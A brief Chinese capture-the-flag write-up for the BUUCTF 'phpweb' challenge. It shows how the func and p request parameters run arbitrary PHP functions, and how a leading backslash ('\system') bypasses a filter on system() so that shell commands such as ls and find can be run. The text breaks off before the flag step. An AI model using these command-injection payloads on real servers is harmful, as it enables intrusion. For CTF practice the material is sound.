提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[网鼎杯 2020 朱雀组]phpweb 1
一、抓包查看信息
使用burpsuite工具进行抓包
发现会上传两个参数信息,func和p
1.测试二者的关系
func=md5&p=123
发现123的md5值会显示在页面上
因此猜测func是用于输入函数、p是用于输入命令
二、获取flag
1.输入func=system&p=ls
失败,因为system被过滤了
2.输入func=\system&p=ls
但是一直向上级目录查找,都没有flag,需要用到查找命令
3.输入func=\system&p=find / -name flag*
4.获取flag<